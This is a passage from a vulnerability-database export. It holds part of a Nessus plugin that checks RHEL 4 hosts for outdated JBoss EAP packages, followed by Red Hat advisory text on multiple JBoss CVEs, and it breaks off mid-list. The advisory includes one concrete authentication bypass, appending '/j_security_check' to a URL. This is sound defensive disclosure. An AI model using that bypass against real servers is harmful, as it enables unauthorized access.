script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2-scripts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.1-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.2-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.3-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-which10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-which11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-security\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0197\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL4\", rpm:\"jboss-seam2-\")) || rpm_exists(rpm:\"jbossas-welcome-content-eap\")) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EWP\");\n\n if (rpm_check(release:\"RHEL4\", reference:\"aopalliance-1.0-5.2.jdk6.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"apache-cxf-2.2.12-6.1.patch_04.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"bsh2-2.0-0.b4.15.1.patch01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"bsh2-bsf-2.0-0.b4.15.1.patch01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"glassfish-jaxb-2.1.12-12_patch_03.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"google-guice-2.0-3.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-3.3.2-1.6.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-annotations-3.4.0-3.4.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-annotations-javadoc-3.4.0-3.4.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-entitymanager-3.4.0-4.4.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-entitymanager-javadoc-3.4.0-4.4.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-javadoc-3.3.2-1.6.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-search-3.1.1-2.3.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"hibernate3-search-javadoc-3.1.1-2.3.GA_CP05.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jacorb-jboss-2.3.2-2.jboss_1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"javassist-3.12.0-6.SP1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-aop2-2.1.6-5.CP06.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-bootstrap-1.0.2-1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-cache-core-3.2.11-1.GA.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-cache-pojo-3.0.1-1.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-cl-2.0.11-1.GA.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-cluster-ha-server-api-1.2.1-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-common-beans-1.0.1-2.1.Final.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-common-core-2.2.21-1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"jboss-eap5-native-5.2.0-6.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"jboss-eap5-native-5.2.0-6.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb-3.0-api-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-cache-1.0.0-4.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-core-1.3.9-0.4.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-ext-api-1.0.0-4.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-ext-api-impl-1.0.0-3.7.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-interceptors-1.0.9-0.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-metadata-1.0.0-3.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-metrics-deployer-1.1.1-0.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-security-1.0.2-0.5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-timeout-0.1.1-0.5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-timeout-3.0-api-0.1.1-0.5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-timeout-spi-0.1.1-0.5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-ejb3-transactions-1.0.2-1.4.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-jacc-1.1-api-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-jad-1.2-api-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-jaspi-1.0-api-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-javaee-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-javaee-poms-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-jaxrpc-api_1.1_spec-1.0.0-16.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-jca-1.5-api-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-jms-1.1-api-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-jpa-deployers-1.0.0-6.SP2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-logmanager-1.1.2-6.GA_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-naming-5.0.3-5.CP02.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-reflect-2.0.4-2.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-remoting-2.5.4-10.SP4.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-seam2-2.2.6.EAP5-9.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-seam2-docs-2.2.6.EAP5-9.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-seam2-examples-2.2.6.EAP5-9.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-seam2-runtime-2.2.6.EAP5-9.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-security-negotiation-2.1.3-1.GA.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-security-spi-2.0.5-4.SP3_1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-transaction-1.0.1-api-5.0.2-2.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jboss-vfs2-2.2.1-2.GA.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossas-web-5.2.0-7.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossas-web-client-5.2.0-7.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossas-web-tp-licenses-5.2.0-7.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossas-web-ws-native-5.2.0-7.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossas-ws-cxf-ewp-5.2.0-8.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbosssx2-2.0.5-8.3.SP3_1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossts-4.6.1-12.CP13.8.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossts-javadoc-4.6.1-12.CP13.8.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossweb-2.1.13-2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossweb-el-1.0-api-2.1.13-2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossweb-jsp-2.1-api-2.1.13-2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossweb-lib-2.1.13-2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossweb-servlet-2.5-api-2.1.13-2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossws-3.1.2-13.SP15_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossws-common-1.1.0-9.SP10.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossws-framework-3.1.2-9.SP13.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jbossws-spi-1.1.2-6.SP8.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jgroups-2.6.22-1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jopr-embedded-1.3.4-19.SP6.9.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jopr-hibernate-plugin-3.0.0-14.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jopr-jboss-as-5-plugin-3.0.0-15.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"jopr-jboss-cache-v3-plugin-3.0.0-15.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"mod_cluster-demo-1.0.10-12.2.GA_CP04.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"mod_cluster-jbossas-1.0.10-12.2.GA_CP04.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"mod_cluster-jbossweb2-1.0.10-12.2.GA_CP04.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"mod_cluster-native-1.0.10-10.GA_CP04_patch01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"mod_cluster-native-1.0.10-10.GA_CP04_patch01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"mod_cluster-tomcat6-1.0.10-12.2.GA_CP04.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"picketlink-federation-2.1.5-3.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"picketlink-quickstarts-2.1.5-1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"picketlink-quickstarts-idp-2.1.5-1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"picketlink-quickstarts-pdp-2.1.5-1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"picketlink-quickstarts-sts-2.1.5-1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"resteasy-1.2.1-18.CP02_patch02.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"resteasy-examples-1.2.1-18.CP02_patch02.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"resteasy-javadoc-1.2.1-18.CP02_patch02.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"resteasy-manual-1.2.1-18.CP02_patch02.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rh-ewp-docs-5.2.0-7.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rh-ewp-docs-examples-5.2.0-7.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-common-parent-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-client-api-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-comm-api-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-domain-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-gui-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-native-system-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-parent-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-plugin-api-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-plugin-container-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-core-util-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-jboss-as-common-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-jmx-plugin-3.0.0-21.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-modules-parent-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-parent-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-platform-plugin-3.0.0-15.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"rhq-plugins-parent-3.0.0-22.EmbJopr5.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"spring2-2.5.6-9.SEC03.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"spring2-agent-2.5.6-9.SEC03.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"spring2-all-2.5.6-9.SEC03.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"spring2-aop-2.5.6-9.SEC03.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"spring2-beans-2.5.6-9.SEC03.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"spring2-context-2.5.6-9.SEC03.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"spring2-core-2.5.6-9.SEC03.1.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"wss4j-1.5.12-4.2_patch_02.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xerces-j2-2.9.1-10.patch02.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xerces-j2-scripts-2.9.1-10.patch02.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-jaxp-1.1-apis-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-jaxp-1.2-apis-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-jaxp-1.3-apis-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-resolver10-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-resolver11-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-resolver12-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-which10-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-commons-which11-1.3.04-8.2_patch_01.ep5.el4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"xml-security-1.5.1-2.ep5.el4\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"aopalliance / apache-cxf / bsh2 / bsh2-bsf / glassfish-jaxb / etc\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:56:09", "description": "Updated JBoss Enterprise Application Platform 5.2.0 packages that fix multiple security issues, various bugs, and add several enhancements are now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThis JBoss Enterprise Application Platform 5.2.0 release serves as a replacement for JBoss Enterprise Application Platform 5.1.2, and includes bug fixes and enhancements. Refer to the JBoss Enterprise Application Platform 5.2.0 Release Notes for information on the most significant of these changes. The Release Notes will be available shortly from https://access.redhat.com/knowledge/docs/\n\nAn attack technique against the W3C XML Encryption Standard when block ciphers were used in CBC mode could allow a remote attacker to conduct chosen-ciphertext attacks, leading to the recovery of the entire plain text of a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing symmetric keys (for XML encryption), allowing a remote attacker to recover the entire plain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL) expressions twice, allowing a remote attacker to execute arbitrary code in the context of the application server, or to obtain sensitive information from the server. Manual action is required to apply this fix. Refer to the Solution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by a Supporting Token, but not whether the correct token was used. A remote attacker could transmit confidential information without the appropriate security, and potentially circumvent access controls on web services exposed via Apache CXF. Refer to the Solution section for details. (CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another component that calls request.setUserPrincipal() before the call to FormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was possible to bypass the security constraint checks in the FORM authenticator by appending '/j_security_check' to the end of a URL.\n(CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote attacker to hijack the authenticated JMX Console session of an administrator. (CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against victims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential if no security context was provided. Depending on the deployed applications, this could possibly allow a remote attacker to hijack the credentials of a previously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific roles did not actually restrict access, allowing remote attackers with valid JMX Invoker credentials to perform JMX operations accessible to roles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing local users to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain text when an exception was thrown. This could lead to the exposure of authentication credentials if local users had permissions to read the log file. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow unauthenticated access by default in some profiles. The security interceptor's second layer of authentication prevented direct exploitation of this flaw. If the interceptor was misconfigured or inadvertently disabled, this flaw could lead to arbitrary code execution in the context of the user running the JBoss server.\n(CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication when a JGroups channel was started, allowing attackers on the adjacent network to read diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call if a null password was provided. In non-default configurations this could possibly lead to a remote attacker hijacking a previously-authenticated user's session. (CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum for reporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project for reporting CVE-2012-2379; and Tyler Krpata for reporting CVE-2011-4575. CVE-2012-3370 and CVE-2012-3369 were discovered by Carlo de Wolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of Red Hat; CVE-2012-0874 discovered by David Jorm of Red Hat; and CVE-2012-2377 was discovered by Red Hat.", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2013-01-24T00:00:00", "type": "nessus", "title": "RHEL 4 : JBoss EAP (RHSA-2013:0193)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-5066", "CVE-2011-1096", "CVE-2011-2487", "CVE-2011-2730", "CVE-2011-2908", "CVE-2011-4575", "CVE-2012-0034", "CVE-2012-0874", "CVE-2012-2377", "CVE-2012-2379", "CVE-2012-3369", "CVE-2012-3370", "CVE-2012-3546", "CVE-2012-5478"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:aopalliance", "p-cpe:/a:redhat:enterprise_linux:apache-cxf", "p-cpe:/a:redhat:enterprise_linux:bsh2", "p-cpe:/a:redhat:enterprise_linux:bsh2-bsf", "p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb", "p-cpe:/a:redhat:enterprise_linux:google-guice", "p-cpe:/a:redhat:enterprise_linux:hibernate3", "p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations", "p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager", "p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-search", "p-cpe:/a:redhat:enterprise_linux:hibernate3-search-javadoc", "p-cpe:/a:redhat:enterprise_linux:hornetq", "p-cpe:/a:redhat:enterprise_linux:hornetq-native", "p-cpe:/a:redhat:enterprise_linux:jacorb-jboss", "p-cpe:/a:redhat:enterprise_linux:javassist", "p-cpe:/a:redhat:enterprise_linux:jboss-aop2", "p-cpe:/a:redhat:enterprise_linux:jboss-bootstrap", "p-cpe:/a:redhat:enterprise_linux:jboss-cache-core", "p-cpe:/a:redhat:enterprise_linux:jboss-cache-pojo", "p-cpe:/a:redhat:enterprise_linux:jboss-cl", "p-cpe:/a:redhat:enterprise_linux:jboss-cluster-ha-server-api", "p-cpe:/a:redhat:enterprise_linux:jboss-common-beans", "p-cpe:/a:redhat:enterprise_linux:jboss-common-core", "p-cpe:/a:redhat:enterprise_linux:jboss-eap5-native", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb-3.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-cache", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-core", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api-impl", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-interceptors", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metadata", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metrics-deployer", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-security", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-3.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-spi", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-transactions", "p-cpe:/a:redhat:enterprise_linux:jboss-jacc-1.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jad-1.2-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jaspi-1.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-javaee", "p-cpe:/a:redhat:enterprise_linux:jboss-javaee-poms", "p-cpe:/a:redhat:enterprise_linux:jboss-jaxrpc-api_1.1_spec", "p-cpe:/a:redhat:enterprise_linux:jboss-jca-1.5-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jms-1.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jpa-deployers", "p-cpe:/a:redhat:enterprise_linux:jboss-logmanager", "p-cpe:/a:redhat:enterprise_linux:jboss-messaging", "p-cpe:/a:redhat:enterprise_linux:jboss-naming", "p-cpe:/a:redhat:enterprise_linux:jboss-reflect", "p-cpe:/a:redhat:enterprise_linux:jboss-remoting", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-docs", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-examples", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-runtime", "p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation", 